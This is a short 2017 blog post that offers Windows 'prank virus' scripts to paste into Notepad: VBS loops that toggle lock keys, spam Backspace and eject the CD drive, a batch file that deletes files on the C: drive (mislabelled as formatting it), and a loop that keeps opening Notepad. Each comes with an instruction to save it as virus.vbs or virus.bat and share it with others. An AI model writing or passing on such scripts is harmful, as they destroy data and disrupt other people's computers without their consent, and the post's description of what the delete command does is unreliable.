Friday 23 June 2017

Creating Computer Viruses for fun by Notepad ~ GNIITHELP


I am providing easy codes that will make you viruses using notepad. This code based files can harm your computer so do not try these tricks on your own computer. Copy given code to Notepad and follow the given instructions.

1. Toggle your friend's Caps Lock, Num Lock, Scroll Lock buttons : 
 Set wshShell =wscript.CreateObject("WScript.Shell")  
 do  
 wscript.sleep 100  
 wshshell.sendkeys "{CAPSLOCK}"
 wshshell.sendkeys "{NUMLOCK}"
 wshshell.sendkeys "{SCROLLLOCK}"  
 loop  

Save this as "virus.vbs" and share it.

2. Frustrate somebody by making him/her hit Backspace again and again :

 MsgBox "Please try to go back"  
 Set wshShell =wscript.CreateObject("WScript.Shell")  
 do  
 wscript.sleep 100  
 wshshell.sendkeys "{bs}"  
 loop  
Save this as "virus.vbs" and share it.

3. Ejecting your friend's CD Drive again n again : 

 Set oWMP = CreateObject("WMPlayer.OCX.7")  
 Set colCDROMs = oWMP.cdromCollection  
 do  
 if colCDROMs.Count >= 1 then  
 For i = 0 to colCDROMs.Count - 1  
 colCDROMs.Item(i).Eject  
 Next  
 For i = 0 to colCDROMs.Count - 1  
 colCDROMs.Item(i).Eject  
 Next  
 End If  
 wscript.sleep 5000  
 loop  
Save this as "virus.vbs" and share it.

4. Creating Virus That Format C Drive : (for Win XP) 

 @Echo off  
 Del C:\ *.* |y  
Save this as "virus.bat" and share it.

5. Open Notepad continually in your friend's computer: 

 @ECHO off  
 :top  
 START %SystemRoot%\system32\notepad.exe  
 GOTO top  
Save this as "virus.bat" and share it.

No comments:

Post a Comment